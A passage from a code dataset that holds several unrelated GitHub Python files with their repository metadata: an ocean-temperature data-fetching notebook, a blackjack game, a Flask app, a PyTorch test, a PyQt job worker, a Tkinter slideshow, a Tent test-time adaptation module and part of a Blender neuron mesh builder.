= os.path.abspath(os.path.join(os.getcwd(), os.pardir,\n os.pardir, '{}.md'.format(name)))\n\nwith open('{}'.format(content), 'w') as f:\n f.writelines(markdown)\n\n\nhtml = \"\"\"\n\n

This post was written as an IPython notebook (%s.ipynb). It is available for\ndownload. You can also try an interactive version on\nbinder.
\n\"\"\" % (name)\n\nfrom datetime import datetime, timedelta\n\nevent_date = datetime(2015, 8, 15)\n\nstart = event_date - timedelta(days=4)\nstop = event_date + timedelta(days=4)\n\nspacing = 0.25\n\nbbox = [-71.05-spacing, 42.28-spacing,\n -70.82+spacing, 42.38+spacing]\n\nimport iris\nfrom utilities import CF_names\n\nsos_name = 'sea_water_temperature'\nname_list = CF_names[sos_name]\n\nunits = iris.unit.Unit('celsius')\n\nfrom owslib import fes\nfrom utilities import fes_date_filter\n\nkw = dict(wildCard='*',\n escapeChar='\\\\',\n singleChar='?',\n propertyname='apiso:AnyText')\n\nor_filt = fes.Or([fes.PropertyIsLike(literal=('*%s*' % val), **kw)\n for val in name_list])\n\n# Exclude ROMS Averages and History files.\nnot_filt = fes.Not([fes.PropertyIsLike(literal='*Averages*', **kw)])\n\nbegin, end = fes_date_filter(start, stop)\nfilter_list = [fes.And([fes.BBox(bbox), begin, end, or_filt, not_filt])]\n\nfrom owslib.csw import CatalogueServiceWeb\n\ncsw = CatalogueServiceWeb('http://www.ngdc.noaa.gov/geoportal/csw',\n timeout=60)\n\ncsw.getrecords2(constraints=filter_list, maxrecords=1000, esn='full')\n\nfmt = '{:*^64}'.format\nprint(fmt(' Catalog information '))\nprint(\"CSW version: {}\".format(csw.version))\nprint(\"Number of datasets available: {}\".format(len(csw.records.keys())))\n\nfrom utilities import service_urls\n\ndap_urls = service_urls(csw.records, service='odp:url')\nsos_urls = service_urls(csw.records, service='sos:url')\n\nprint(fmt(' SOS '))\nfor url in sos_urls:\n print('{}'.format(url))\n\nprint(fmt(' DAP '))\nfor url in dap_urls:\n print('{}.html'.format(url))\n\nfrom utilities import is_station\n\nnon_stations = []\nfor url in dap_urls:\n try:\n if not is_station(url):\n non_stations.append(url)\n except RuntimeError as e:\n print(\"Could not access URL {}. 
{!r}\".format(url, e))\n\ndap_urls = non_stations\n\nprint(fmt(' Filtered DAP '))\nfor url in dap_urls:\n print('{}.html'.format(url))\n\nfrom pyoos.collectors.ndbc.ndbc_sos import NdbcSos\n\ncollector_ndbc = NdbcSos()\n\ncollector_ndbc.set_bbox(bbox)\ncollector_ndbc.end_time = stop\ncollector_ndbc.start_time = start\ncollector_ndbc.variables = [sos_name]\n\nofrs = collector_ndbc.server.offerings\ntitle = collector_ndbc.server.identification.title\nprint(fmt(' NDBC Collector offerings '))\nprint('{}: {} offerings'.format(title, len(ofrs)))\n\nfrom utilities import collector2table, get_ndbc_longname\n\nndbc = collector2table(collector=collector_ndbc)\n\nnames = []\nfor s in ndbc['station']:\n try:\n name = get_ndbc_longname(s)\n except ValueError:\n name = s\n names.append(name)\n\nndbc['name'] = names\n\nndbc.set_index('name', inplace=True)\nndbc.head()\n\nfrom pyoos.collectors.coops.coops_sos import CoopsSos\n\ncollector_coops = CoopsSos()\n\ncollector_coops.set_bbox(bbox)\ncollector_coops.end_time = stop\ncollector_coops.start_time = start\ncollector_coops.variables = [sos_name]\n\nofrs = collector_coops.server.offerings\ntitle = collector_coops.server.identification.title\nprint(fmt(' Collector offerings '))\nprint('{}: {} offerings'.format(title, len(ofrs)))\n\nfrom utilities import get_coops_metadata\n\ncoops = collector2table(collector=collector_coops)\n\nnames = []\nfor s in coops['station']:\n try:\n name = get_coops_metadata(s)[0]\n except ValueError:\n name = s\n names.append(name)\n\ncoops['name'] = names\n\ncoops.set_index('name', inplace=True)\ncoops.head()\n\nfrom pandas import concat\n\nall_obs = concat([coops, ndbc])\n\nall_obs.head()\n\nfrom pandas import DataFrame\nfrom owslib.ows import ExceptionReport\nfrom utilities import pyoos2df, save_timeseries\n\niris.FUTURE.netcdf_promote = True\n\ndata = dict()\ncol = 'sea_water_temperature (C)'\nfor station in all_obs.index:\n try:\n idx = all_obs['station'][station]\n df = pyoos2df(collector_ndbc, idx, df_name=station)\n if df.empty:\n df = pyoos2df(collector_coops, idx, df_name=station)\n data.update({idx: df[col]})\n except ExceptionReport as e:\n print(\"[{}] {}:\\n{}\".format(idx, station, e))\n\nfrom pandas import date_range\n\nindex = date_range(start=start, end=stop, freq='1H')\nfor k, v in data.iteritems():\n data[k] = v.reindex(index=index, limit=1, method='nearest')\n\nobs_data = DataFrame.from_dict(data)\n\nobs_data.head()\n\nimport warnings\nfrom iris.exceptions import (CoordinateNotFoundError, ConstraintMismatchError,\n MergeError)\nfrom utilities import (quick_load_cubes, proc_cube, is_model,\n get_model_name, get_surface)\n\ncubes = dict()\nfor k, url in enumerate(dap_urls):\n print('\\n[Reading url {}/{}]: {}'.format(k+1, len(dap_urls), url))\n try:\n cube = quick_load_cubes(url, name_list,\n callback=None, strict=True)\n if is_model(cube):\n cube = proc_cube(cube, bbox=bbox,\n time=(start, stop), units=units)\n else:\n print(\"[Not model data]: {}\".format(url))\n continue\n cube = get_surface(cube)\n mod_name, model_full_name = get_model_name(cube, url)\n cubes.update({mod_name: cube})\n except (RuntimeError, ValueError,\n ConstraintMismatchError, CoordinateNotFoundError,\n IndexError) as e:\n print('Cannot get cube for: {}\\n{}'.format(url, e))\n\nfrom iris.pandas import as_series\nfrom utilities import (make_tree, get_nearest_water,\n add_station, ensure_timeseries, remove_ssh)\n\nmodel_data = dict()\nfor mod_name, cube in cubes.items():\n print(fmt(mod_name))\n try:\n tree, lon, lat = make_tree(cube)\n 
except CoordinateNotFoundError as e:\n print('Cannot make KDTree for: {}'.format(mod_name))\n continue\n # Get model series at observed locations.\n raw_series = dict()\n for station, obs in all_obs.iterrows():\n try:\n kw = dict(k=10, max_dist=0.08, min_var=0.01)\n args = cube, tree, obs.lon, obs.lat\n series, dist, idx = get_nearest_water(*args, **kw)\n except ValueError as e:\n status = \"No Data\"\n print('[{}] {}'.format(status, obs.name))\n continue\n if not series:\n status = \"Land \"\n else:\n series = as_series(series)\n raw_series.update({obs['station']: series})\n status = \"Water \"\n print('[{}] {}'.format(status, obs.name))\n if raw_series: # Save that model series.\n model_data.update({mod_name: raw_series})\n del cube\n\nimport matplotlib.pyplot as plt\n\nbuoy = '44013'\n\nfig, ax = plt.subplots(figsize=(11, 2.75))\n\nobs_data[buoy].plot(ax=ax, label='Buoy')\n\nfor model in model_data.keys():\n try:\n model_data[model][buoy].plot(ax=ax, label=model)\n except KeyError:\n pass # Could not find a model at this location.\n\nleg = ax.legend()\n\nbuoy = '44029'\n\nfig, ax = plt.subplots(figsize=(11, 2.75))\n\nobs_data[buoy].plot(ax=ax, label='Buoy')\n\nfor model in model_data.keys():\n try:\n model_data[model][buoy].plot(ax=ax, label=model)\n except KeyError:\n pass # Could not find a model at this location.\n\nleg = ax.legend()\n\nbuoy = '8443970'\n\nfig, ax = plt.subplots(figsize=(11, 2.75))\n\nobs_data[buoy].plot(ax=ax, label='Buoy')\n\nfor model in model_data.keys():\n try:\n model_data[model][buoy].plot(ax=ax, label=model)\n except KeyError:\n pass # Could not find a model at this location.\n\nleg = ax.legend()\n\nHTML(html)\n\n","repo_name":"mixmikmic/GH_code_analysis","sub_path":"python/2015-10-12-fetching_data.py","file_name":"2015-10-12-fetching_data.py","file_ext":"py","file_size_in_byte":8757,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"34188838343","text":"import os\nfrom art import logo\nfrom random import choices, choice\n\nCARTAS = [11, 2, 3, 4, 5, 6, 7, 8, 9, 10, 10, 10]\n\nif input('Você gostaria de jogar 21? Escolha \"s\" ou \"n\": ').lower() == 's':\n os.system('cls')\n print(logo)\n\n # Initial deal\n cartas_jogador = choices(CARTAS, k=2)\n cartas_computador = choices(CARTAS, k=1)\n\n imprimir_cartas_jogador = f'Suas cartas: {cartas_jogador}'\n imprimir_cartas_computador = f'Cartas do computador: {cartas_computador}'\n\n print(imprimir_cartas_jogador)\n print(imprimir_cartas_computador)\n\n # First round\n if input('Gostaria de mais uma carta? \"s\" ou \"n\": ').lower() == 's':\n cartas_jogador.append(choice(CARTAS))\n cartas_computador.append(choice(CARTAS))\n\n print(f'Suas cartas: {cartas_jogador}')\n print(f'Cartas do computador: {cartas_computador}')\n\nelse:\n print('Muito Obrigado!')\n","repo_name":"pedrolisboaa/bootcamp_python_100_days","sub_path":"Beginner/Day 11 - Black Jack/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"73465501229","text":"from flask import redirect, url_for, render_template, request\r\nfrom rates_app import app\r\nimport funcs\r\n\r\n\r\n@app.route(\"/\")\r\ndef home():\r\n funcs.update_bd()\r\n return redirect(url_for(\"get_rates\"))\r\n\r\n\r\n@app.route(\"/rates/\")\r\ndef get_rates():\r\n if request.args: # Requested rate\r\n get_records = funcs.filter_r(request.args) # Requested, barely readable records.\r\n else:\r\n get_records = funcs.get_all_last_updated_cc() # All available, barely readable records.\r\n customize_it = funcs.create_tup(get_records) # Readable and compact form to proceed to the next step.\r\n return render_template(\"main.html\", rates=customize_it)\r\n","repo_name":"olmits/xrate","sub_path":"urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"2046447922","text":"from catbird.models.modules.recurrent_modules import RecurrentLayer\nimport torch\n\n\ndef test_recurrent_layer():\n batch_size = 16\n hidden_size = 128\n num_layers = 3\n seq_length = 10\n\n x = torch.rand(seq_length, batch_size, hidden_size)\n\n rnn = RecurrentLayer(\n \"LSTM\",\n hidden_size,\n hidden_size,\n num_layers=3,\n bias=True,\n batch_first=False,\n residual=True,\n dropout=0.0,\n bidirectional=False,\n )\n state_size = num_layers, batch_size, hidden_size\n\n h0 = x.new_zeros(*state_size)\n c0 = x.new_zeros(*state_size)\n x, (final_hiddens, final_cells) = rnn(\n x, (h0, c0)\n ) # [seq_len, btz, hid], ([nlayers, btz, hid], [nlayers, btz, hid])\n\n print(x.shape)\n print(final_hiddens.shape)\n print(final_cells.shape)\n\n assert False\n","repo_name":"afonso-sousa/catbird","sub_path":"tests/test_models/test_modules.py/test_recurrent.py","file_name":"test_recurrent.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"38"} +{"seq_id":"39084904650","text":"from typing import List\n\nfrom PyQt5 import QtCore\n\nfrom thread import job, enums\n\n\nclass Worker(QtCore.QObject):\n progressUpdate = QtCore.pyqtSignal(job.Job, float)\n jobComplete = QtCore.pyqtSignal(job.Job)\n\n activeChange = QtCore.pyqtSignal(bool)\n stopSuccess = QtCore.pyqtSignal()\n debugMessage = QtCore.pyqtSignal(str)\n\n # region Setup\n def __init__(self):\n super().__init__()\n # 0 is the front of the queue; the current job is the one at the front of the queue\n # a job must always be on the queue before calling do_job\n\n # Kanban job queues\n self._to_do_queue: List[job.Job] = []\n self._doing_queue: List[job.Job] = []\n self._job_number: int = 0\n self._job_loop_active: bool = False\n self._worker_active: bool = False\n self._stopping: bool = False\n # endregion\n\n # region Slots for Manager\n def request_job(self,\n job_: job.Job,\n queue_as: enums.QueueAs\n ):\n self._job_number += 1\n job_.job_number = self._job_number\n job_.set_job_checkpoint(self._job_checkpoint)\n self._stopping = False\n\n if queue_as == 
enums.QueueAs.ENQUEUE:\n # join the back of the queue and wait its turn\n self._to_do_queue.append(job_)\n elif queue_as == enums.QueueAs.SINGULAR:\n # Command to just run this job and get rid of all the others as quickly as possible\n # request all other jobs to stop\n # add this job to be next in the queue\n self._request_all_existing_jobs_stop()\n self._to_do_queue.append(job_)\n elif queue_as == enums.QueueAs.EXPEDITE:\n # should always have the job loop active if running a job\n if self._job_loop_active:\n # don't need to worry about ensuring an active job loop\n # do this job leaving the previous current job partially completed\n self._do_job(job_)\n # so can then continue with previous job that was in progress or the next in the queue\n\n # Clean up:\n # If job queue already active it will do nothing. Cleanup will happen when another one stops.\n # If it is inactive and there is nothing to do, then this is the last job in progress and it will clean up.\n\n # if not self._job_loop_active and not self._to_do_queue:\n # self._final_cleanup()\n else:\n # use the job loop to run the job\n self._to_do_queue.append(job_)\n\n # Always call the job loop and let it sort out running of other jobs and ultimate cleanup.\n self._job_loop()\n\n # if not self._job_loop_active and len(self._todo_queue) > 0:\n # self._job_loop()\n\n # def _print_status(self, calling_point: str):\n # print(calling_point)\n # print(f\"to_do : {len(self._to_do_queue)}\")\n # print(f\"doing : {len(self._doing_queue)}\")\n # print(f\"loop active : {self._job_loop_active}\")\n # print(f\"stopping : {self._stopping}\")\n\n def request_stop(self):\n # cancel all jobs in the to_do queue\n # self._print_status(\"request_stop start\")\n self._stopping = True\n self._request_all_existing_jobs_stop()\n if not self._doing_queue:\n self._set_active(False)\n self.stopSuccess.emit()\n self._stopping = False\n # self._print_status(\"request_stop end\")\n\n def _request_all_existing_jobs_stop(self):\n self._to_do_queue.clear()\n for job_ in self._doing_queue:\n job_.stop_requested = True\n # endregion\n\n # region Job Processing\n def _job_loop(self):\n if not self._job_loop_active:\n self._job_loop_active = True\n while self._to_do_queue:\n current_job = self._to_do_queue.pop(0)\n self._do_job(current_job)\n self._job_loop_active = False\n\n if not self._doing_queue: # otherwise it will clean up here once the doing queue is empty\n self._final_cleanup()\n\n def _final_cleanup(self):\n # execution about to end, do clean-up\n self._set_active(False)\n # if the final job in the queue was requested to stop then this was a stop request, so emit stopSuccess\n if self._stopping:\n self.stopSuccess.emit()\n self._to_do_queue.clear()\n self._stopping = False\n # self._print_status(\"_final_cleanup\")\n\n def _do_job(self, job_: job.Job):\n # self._print_status(\"_do_job\")\n self._set_active(True)\n # add to (front) of doing queue\n self._doing_queue.insert(0, job_)\n job_.run()\n # if job is stopped early it will re-emerge here\n # let the thread event-queue run so this job can be requested to be stopped - thought to not be required\n # QtWidgets.QApplication.processEvents()\n # if the job was requested to be stopped then we don't want the actions associated with the job completing\n if not job_.stop_requested:\n self.jobComplete.emit(job_)\n # remove from doing queue\n self._doing_queue.remove(job_)\n\n def _set_active(self, active: bool):\n if active != self._worker_active:\n self._worker_active = active\n self.activeChange.emit(active)\n\n 
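# Illustrative sketch (hypothetical caller code, not part of this module): a manager\n # owning this worker might preempt the current work with\n # worker.request_job(some_job, enums.QueueAs.EXPEDITE)\n # while ENQUEUE jobs wait their turn and SINGULAR clears existing jobs first.\n 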
def _job_checkpoint(self, job_: job.Job, progress: float = 0.0):\n if job_.progress_estimator:\n self.progressUpdate.emit(job_, progress)\n # endregion\n","repo_name":"RobinLeeCarter/Mandel","sub_path":"thread/worker.py","file_name":"worker.py","file_ext":"py","file_size_in_byte":5607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"71604438511","text":"# import required modules\nimport tkinter as tk\nfrom tkinter import *\nfrom PIL import Image\nfrom PIL import ImageTk\n \n \n \n# adjust window\nroot=tk.Tk()\nroot.geometry(\"500x500\")\n \n# loading the images\npicture1=ImageTk.PhotoImage(Image.open(\"p2.jpg\"))\npicture2=ImageTk.PhotoImage(Image.open(\"p3.jpg\"))\npicture3=ImageTk.PhotoImage(Image.open(\"p4.jpg\"))\n \nb=Label()\nb.pack()\n \n \n \n# using recursion to slide to next image\ni = 1\n \n# function to change to slide image\ndef move():\n global i\n if i == 4:\n i = 1\n if i == 1:\n b.config(image=picture1)\n elif i == 2:\n b.config(image=picture2)\n elif i == 3:\n b.config(image=picture3)\n i = i+1\n root.after(2000, move)\n \n# calling the function\nmove()\nroot.mainloop()","repo_name":"karanganwatuyisenge/MultimediaAss","sub_path":"index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"39227832515","text":"\"\"\"\r\nBuilds upon: https://github.com/DequanWang/tent\r\nCorresponding paper: https://arxiv.org/abs/2006.10726\r\n\"\"\"\r\n\r\nimport torch.nn as nn\r\nimport torch.jit\r\n\r\nfrom methods.base import TTAMethod\r\n\r\n\r\nclass Tent(TTAMethod):\r\n \"\"\"Tent adapts a model by entropy minimization during testing.\r\n\r\n Once tented, a model adapts itself by updating on every forward.\r\n \"\"\"\r\n @torch.enable_grad() # ensure grads in possible no grad context for testing\r\n def forward_and_adapt(self, x):\r\n \"\"\"Forward and adapt model on batch of data.\r\n Measure entropy of the model prediction, take gradients, and update params.\r\n \"\"\"\r\n self.optimizer.zero_grad()\r\n outputs = self.model(x)\r\n loss = softmax_entropy(outputs).mean()\r\n loss.backward()\r\n self.optimizer.step()\r\n return outputs\r\n\r\n @staticmethod\r\n def collect_params(model):\r\n \"\"\"Collect the affine scale + shift parameters from batch norms.\r\n\r\n Walk the model's modules and collect all batch normalization parameters.\r\n Return the parameters and their names.\r\n\r\n Note: other choices of parameterization are possible!\r\n \"\"\"\r\n params = []\r\n names = []\r\n for nm, m in model.named_modules():\r\n if isinstance(m, nn.BatchNorm2d):\r\n for np, p in m.named_parameters():\r\n if np in ['weight', 'bias']: # weight is scale, bias is shift\r\n params.append(p)\r\n names.append(f\"{nm}.{np}\")\r\n return params, names\r\n\r\n @staticmethod\r\n def configure_model(model):\r\n \"\"\"Configure model for use with tent.\"\"\"\r\n # train mode, because tent optimizes the model to minimize entropy\r\n model.train()\r\n # disable grad, to (re-)enable only what tent updates\r\n model.requires_grad_(False)\r\n # configure norm for tent updates: enable grad + force batch statisics\r\n for m in model.modules():\r\n if isinstance(m, nn.BatchNorm2d):\r\n m.requires_grad_(True)\r\n # force use of batch stats in train and eval modes\r\n m.track_running_stats = False\r\n m.running_mean = None\r\n m.running_var = None\r\n return model\r\n\r\n @staticmethod\r\n def check_model(model):\r\n \"\"\"Check 
model for compatibility with tent.\"\"\"\r\n is_training = model.training\r\n assert is_training, \"tent needs train mode: call model.train()\"\r\n param_grads = [p.requires_grad for p in model.parameters()]\r\n has_any_params = any(param_grads)\r\n has_all_params = all(param_grads)\r\n assert has_any_params, \"tent needs params to update: \" \\\r\n \"check which require grad\"\r\n assert not has_all_params, \"tent should not update all params: \" \\\r\n \"check which require grad\"\r\n has_bn = any([isinstance(m, nn.BatchNorm2d) for m in model.modules()])\r\n assert has_bn, \"tent needs normalization for its optimization\"\r\n\r\n\r\n@torch.jit.script\r\ndef softmax_entropy(x: torch.Tensor) -> torch.Tensor:\r\n \"\"\"Entropy of softmax distribution from logits.\"\"\"\r\n return -(x.softmax(1) * x.log_softmax(1)).sum(1)\r\n","repo_name":"mariodoebler/test-time-adaptation","sub_path":"segmentation/methods/tent.py","file_name":"tent.py","file_ext":"py","file_size_in_byte":3259,"program_lang":"python","lang":"en","doc_type":"code","stars":91,"dataset":"github-code","pt":"38"} +{"seq_id":"31886731055","text":"import copy\n\n# Blender imports\nimport bpy, mathutils\n\n# Internal modules\nimport neuromorphovis as nmv\nimport neuromorphovis.builders\nimport neuromorphovis.enums\nimport neuromorphovis.mesh\nimport neuromorphovis.shading\nimport neuromorphovis.skeleton\nimport neuromorphovis.utilities\nimport neuromorphovis.scene\n\n\n####################################################################################################\n# @MetaBuilder\n####################################################################################################\nclass MetaBuilder:\n \"\"\"Mesh builder that creates high-quality meshes with nice bifurcations based on meta objects.\"\"\"\n\n ################################################################################################\n # @__init__\n ################################################################################################\n def __init__(self,\n morphology,\n options):\n \"\"\"Constructor\n\n :param morphology:\n A given morphology skeleton to create the mesh for.\n :param options:\n Loaded options from NeuroMorphoVis.\n \"\"\"\n\n # Morphology\n self.morphology = morphology\n\n # Loaded options from NeuroMorphoVis\n self.options = options\n\n # A list of the colors/materials of the soma\n self.soma_materials = None\n\n # A list of the colors/materials of the axon\n self.axon_materials = None\n\n # A list of the colors/materials of the basal dendrites\n self.basal_dendrites_materials = None\n\n # A list of the colors/materials of the apical dendrite\n self.apical_dendrite_materials = None\n\n # A list of the colors/materials of the spines\n self.spines_colors = None\n\n # A reference to the reconstructed soma mesh\n self.reconstructed_soma_mesh = None\n\n # A reference to the reconstructed spines mesh\n self.spines_mesh = None\n\n # A parameter to track the current branching order on each arbor\n # NOTE: This parameter must get reset when you start working on a new arbor\n self.branching_order = 0\n\n # A list of all the meshes that are reconstructed on a piecewise basis and correspond to\n # the different components of the neuron including soma, arbors and the spines as well\n self.reconstructed_neuron_meshes = list()\n\n # Meta object skeleton, used to build the skeleton of the morphology\n self.meta_skeleton = None\n\n # Meta object mesh, used to build the mesh of the morphology\n self.meta_mesh = None\n\n # A scale factor that was 
figured out by trial and error to correct the scaling of the radii\n self.magic_scale_factor = 1.575\n\n ################################################################################################\n # @create_materials\n ################################################################################################\n def create_materials(self,\n name,\n color):\n \"\"\"Creates just two materials of the mesh on the input parameters of the user.\n\n :param name:\n The name of the material/color.\n :param color:\n The code of the given colors.\n :return:\n A list of two elements (different or same colors) where we can apply later to the drawn\n sections or segments.\n \"\"\"\n\n # A list of the created materials\n materials_list = []\n\n for i in range(2):\n\n # Create the material\n material = nmv.shading.create_material(\n name='%s_color_%d' % (name, i), color=color,\n material_type=self.options.mesh.material)\n\n # Append the material to the materials list\n materials_list.append(material)\n\n # Return the list\n return materials_list\n\n ################################################################################################\n # @create_skeleton_materials\n ################################################################################################\n def create_skeleton_materials(self):\n \"\"\"Create the materials of the skeleton.\n \"\"\"\n\n for material in bpy.data.materials:\n if 'soma_skeleton' in material.name or \\\n 'axon_skeleton' in material.name or \\\n 'basal_dendrites_skeleton' in material.name or \\\n 'apical_dendrite_skeleton' in material.name or \\\n 'spines' in material.name:\n material.user_clear()\n bpy.data.materials.remove(material)\n\n # Soma\n self.soma_materials = self.create_materials(\n name='soma_skeleton', color=self.options.mesh.soma_color)\n\n # Axon\n self.axon_materials = self.create_materials(\n name='axon_skeleton', color=self.options.mesh.axon_color)\n\n # Basal dendrites\n self.basal_dendrites_materials = self.create_materials(\n name='basal_dendrites_skeleton', color=self.options.mesh.basal_dendrites_color)\n\n # Apical dendrite\n self.apical_dendrite_materials = self.create_materials(\n name='apical_dendrite_skeleton', color=self.options.mesh.apical_dendrites_color)\n\n # Spines\n self.spines_colors = self.create_materials(\n name='spines', color=self.options.mesh.spines_color)\n\n # Create an illumination specific for the given material\n nmv.shading.create_material_specific_illumination(self.options.morphology.material)\n\n ################################################################################################\n # @verify_and_repair_morphology\n ################################################################################################\n def verify_and_repair_morphology(self):\n \"\"\"Verifies and repairs the morphology if the contain any artifacts that would potentially\n affect the reconstruction quality of the mesh.\n \"\"\"\n\n # Remove the internal samples, or the samples that intersect the soma at the first\n # section and each arbor\n nmv.skeleton.ops.apply_operation_to_morphology(\n *[self.morphology, nmv.skeleton.ops.remove_samples_inside_soma])\n\n # The arbors can be selected to be reconstructed with sharp edges or smooth ones. For the\n # sharp edges, we do NOT need to re-sample the morphology skeleton. However, if the smooth\n # edges option is selected, the arbors must be re-sampled to avoid any meshing artifacts\n # after applying the vertex smoothing filter. 
The re-sampling filter for the moment\n # re-samples the morphology sections at 2.5 microns, however this can be improved later\n # by adding an algorithm that re-samples the section based on its radii.\n if self.options.mesh.edges == nmv.enums.Meshing.Edges.SMOOTH:\n\n # Apply the re-sampling filter on the whole morphology skeleton\n nmv.skeleton.ops.apply_operation_to_morphology(\n *[self.morphology, nmv.skeleton.ops.resample_sections])\n\n # Verify the connectivity of the arbors to the soma to filter the disconnected arbors,\n # for example, an axon that is emanating from a dendrite or two intersecting dendrites\n nmv.skeleton.ops.update_arbors_connection_to_soma(self.morphology)\n\n # Primary and secondary branching\n if self.options.mesh.branching == nmv.enums.Meshing.Branching.ANGLES:\n\n # Label the primary and secondary sections based on angles\n nmv.skeleton.ops.apply_operation_to_morphology(\n *[self.morphology,\n nmv.skeleton.ops.label_primary_and_secondary_sections_based_on_angles])\n\n else:\n\n # Label the primary and secondary sections based on radii\n nmv.skeleton.ops.apply_operation_to_morphology(\n *[self.morphology,\n nmv.skeleton.ops.label_primary_and_secondary_sections_based_on_radii])\n\n ################################################################################################\n # @create_meta_segment\n ################################################################################################\n def create_meta_segment(self,\n p1,\n p2,\n r1,\n r2):\n \"\"\"Constructs a segment that is composed of two points with a meta object.\n\n :param p1:\n First point coordinate.\n :param p2:\n Second point coordinate.\n :param r1:\n First point radius.\n :param r2:\n Second point radius.\n \"\"\"\n\n # Segment vector\n segment = p2 - p1\n segment_length = segment.length\n\n # Make sure that the segment length is not zero\n # TODO: Verify this when the radii are greater than the distance\n if segment_length < 0.001:\n return\n\n # Verify the radii, or fix them\n if r1 < 0.001 * segment_length:\n r1 = 0.001 * segment_length\n if r2 < 0.001 * segment_length:\n r2 = 0.001 * segment_length\n\n # Compute the deltas between the first and last points along the segments\n dr = r2 - r1\n dx = p2[0] - p1[0]\n dy = p2[1] - p1[1]\n dz = p2[2] - p1[2]\n\n # Keep track on the distance traveled along the segment while building, initially 0\n travelled_distance = 0.0\n\n # Local points, initially at the first point\n r = r1\n x = p1[0]\n y = p1[1]\n z = p1[2]\n\n # Construct the meta elements along the segment\n while travelled_distance < segment_length:\n\n # Make a meta ball (or sphere) at this point\n meta_element = self.meta_skeleton.elements.new()\n\n # Set its radius\n # TODO: Find a solution to compensate the connection points\n meta_element.radius = r\n\n # Update its coordinates\n meta_element.co = (x, y, z)\n\n # Proceed to the second point\n travelled_distance += r / 2\n\n r = r1 + (travelled_distance * dr / segment_length)\n\n # Get the next point\n x = p1[0] + (travelled_distance * dx / segment_length)\n y = p1[1] + (travelled_distance * dy / segment_length)\n z = p1[2] + (travelled_distance * dz / segment_length)\n\n ################################################################################################\n # @create_meta_section\n ################################################################################################\n def create_meta_section(self,\n section):\n \"\"\"Create a section with meta objects.\n\n :param section:\n A given section to extrude a 
mesh around it.\n \"\"\"\n\n # Get the list of samples\n samples = section.samples\n\n # Ensure that the section has at least two samples, otherwise it will give an error\n if len(samples) < 2:\n return\n\n # Proceed segment by segment\n for i in range(len(samples) - 1):\n self.meta_skeleton.resolution = samples[i].radius * 0.5\n\n # Create the meta segment\n self.create_meta_segment(\n p1=samples[i].point,\n p2=samples[i + 1].point,\n r1=samples[i].radius * self.magic_scale_factor,\n r2=samples[i + 1].radius * self.magic_scale_factor)\n\n ################################################################################################\n # @create_meta_arbor\n ################################################################################################\n def create_meta_arbor(self,\n root,\n max_branching_order):\n \"\"\"Extrude the given arbor section by section recursively using meta objects.\n\n :param root:\n The root of a given section.\n :param max_branching_order:\n The maximum branching order set by the user to terminate the recursive call.\n \"\"\"\n\n # Do not proceed if the branching order limit is hit\n if root.branching_order > max_branching_order:\n return\n\n # Create the section\n self.create_meta_section(root)\n\n # Create the children sections recursively\n for child in root.children:\n self.create_meta_arbor(child, max_branching_order)\n\n ################################################################################################\n # @build_arbors\n ################################################################################################\n def build_arbors(self):\n \"\"\"Builds the arbors of the neuron as tubes and AT THE END converts them into meshes.\n If you convert them during the building, the scene is getting crowded and the process is\n getting exponentially slower.\n\n :return:\n A list of all the individual meshes of the arbors.\n \"\"\"\n\n # Header\n nmv.logger.header('Building Arbors')\n\n # Apply the morphology reformation filters if requested before creating the arbors\n\n # Taper the sections if requested\n if self.options.mesh.skeletonization == nmv.enums.Meshing.Skeleton.TAPERED or \\\n self.options.mesh.skeletonization == nmv.enums.Meshing.Skeleton.TAPERED_ZIGZAG:\n nmv.skeleton.ops.apply_operation_to_morphology(\n *[self.morphology, nmv.skeleton.ops.taper_section])\n\n # Zigzag the sections if required\n if self.options.mesh.skeletonization == nmv.enums.Meshing.Skeleton.ZIGZAG or \\\n self.options.mesh.skeletonization == nmv.enums.Meshing.Skeleton.TAPERED_ZIGZAG:\n nmv.skeleton.ops.apply_operation_to_morphology(\n *[self.morphology, nmv.skeleton.ops.zigzag_section])\n\n # Draw the apical dendrite, if it exists\n if not self.options.morphology.ignore_apical_dendrite:\n nmv.logger.info('Apical dendrite')\n\n # Create the apical dendrite mesh\n if self.morphology.apical_dendrite is not None:\n\n self.create_meta_arbor(\n root=self.morphology.apical_dendrite,\n max_branching_order=self.options.morphology.apical_dendrite_branch_order)\n\n # Draw the basal dendrites\n if not self.options.morphology.ignore_basal_dendrites:\n\n # Do it dendrite by dendrite\n for i, basal_dendrite in enumerate(self.morphology.dendrites):\n\n # Create the basal dendrite meshes\n nmv.logger.info('Dendrite [%d]' % i)\n self.create_meta_arbor(\n root=basal_dendrite,\n max_branching_order=self.options.morphology.basal_dendrites_branch_order)\n\n # Draw the axon as a set of connected sections\n if not self.options.morphology.ignore_axon:\n nmv.logger.info('Axon')\n\n # The axon must be valid\n if self.morphology.axon is not None:\n\n # Create the axon mesh\n self.create_meta_arbor(\n root=self.morphology.axon,\n max_branching_order=self.options.morphology.axon_branch_order)\n\n ################################################################################################\n # @decimate_neuron_mesh\n ################################################################################################\n def decimate_neuron_mesh(self):\n \"\"\"Decimate the reconstructed neuron mesh.\n \"\"\"\n\n nmv.logger.header('Decimating the mesh')\n\n if 0.05 < self.options.mesh.tessellation_level < 1.0:\n nmv.logger.info('Decimating the neuron')\n\n # Get a list of all the mesh objects (except the spines) of the neuron\n neuron_meshes = list()\n for scene_object in bpy.context.scene.objects:\n\n # Only for meshes\n if scene_object.type == 'MESH':\n\n # Exclude the spines\n if 'spine' in scene_object.name:\n continue\n\n # Otherwise, add the object to the list\n else:\n neuron_meshes.append(scene_object)\n\n # Do it mesh by mesh\n for i, object_mesh in enumerate(neuron_meshes):\n\n # Update the texture space of the created meshes\n object_mesh.select = True\n bpy.context.object.data.use_auto_texspace = False\n bpy.context.object.data.texspace_size[0] = 5\n bpy.context.object.data.texspace_size[1] = 5\n 